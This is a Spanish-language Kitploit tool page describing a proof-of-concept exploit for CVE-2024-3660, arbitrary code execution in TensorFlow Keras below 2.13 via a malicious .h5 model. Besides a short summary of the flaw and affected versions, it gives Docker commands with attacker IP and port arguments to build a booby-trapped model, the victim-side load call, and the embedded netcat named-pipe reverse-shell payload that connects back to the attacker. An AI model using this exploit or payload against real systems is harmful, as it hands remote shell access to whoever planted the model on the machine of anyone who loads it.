Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-3660-PoC — Un PoC para CVE-2024-3660. Ejecución arbitraria de código en Keras. | Kitploit
Herramientas/GitHubGitHub/aaryanbhujang/cve-2024-3660-poc
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónDesarrollo de PayloadsSeguridad de IAExplotación de Binarios
GitHubaaryanbhujang/cve-2024-3660-poc

CVE-2024-3660-PoC

Un PoC para CVE-2024-3660. Ejecución arbitraria de código en Keras.

Ver Repositorio
41hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-3660 – Ejecución de código arbitrario en TensorFlow Keras mediante modelo malicioso

Resumen

CVE-2024-3660 es una vulnerabilidad de ejecución de código arbitrario en el framework Keras de TensorFlow que afecta a las versiones < 2.13.
Permite a un atacante incrustar código Python dentro de un modelo (por ejemplo, a través de una capa Lambda) que se ejecuta automáticamente cuando se carga el modelo.

Cuando se carga un archivo de modelo .h5 malicioso en un entorno vulnerable, se ejecutan comandos arbitrarios con los mismos permisos que el proceso de carga.


Versiones afectadas

  • Keras de TensorFlow < 2.13.0
  • Modelos Keras cargados mediante:
    root@kitploit:~
    tf.keras.models.load_model("CVE20243660.h5", compile=False)
    
root@kitploit:~
o en versiones antiguas de TensorFlow donde safe_mode no está habilitado por defecto.

## Descripción del PoC

Este PoC utiliza una compilación basada en Docker para generar un modelo malicioso `hack.h5` que contiene un payload de reverse shell.
Cuando el modelo se carga en una versión vulnerable de TensorFlow, se conecta de vuelta a la máquina del atacante.

# Uso
## 1. Construir y extraer el modelo malicioso
```bash
docker buildx build \
  --platform linux/amd64 \
  --build-arg LHOST=<YOUR-IP> \
  --build-arg LPORT=<YOUR-PORT> \
  -t tfimg . && \
container_id=$(docker create tfimg) && \
docker cp $container_id:/CVE20243660/CVE20243660.h5 ./CVE20243660.h5 && \
docker rm $container_id

2. Cargar el modelo malicioso (lado de la víctima)

  • En un entorno vulnerable de TensorFlow (< 2.13):
root@kitploit:~
import tensorflow as tf
model = tf.keras.models.load_model("CVE20243660.h5", compile=False)

Payload

  • El payload incrustado utiliza nc para una reverse shell:
root@kitploit:~
rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc LHOST LPORT >/tmp/f

Referencias

NVD CMU Oligo Secuirty

Descargar herramienta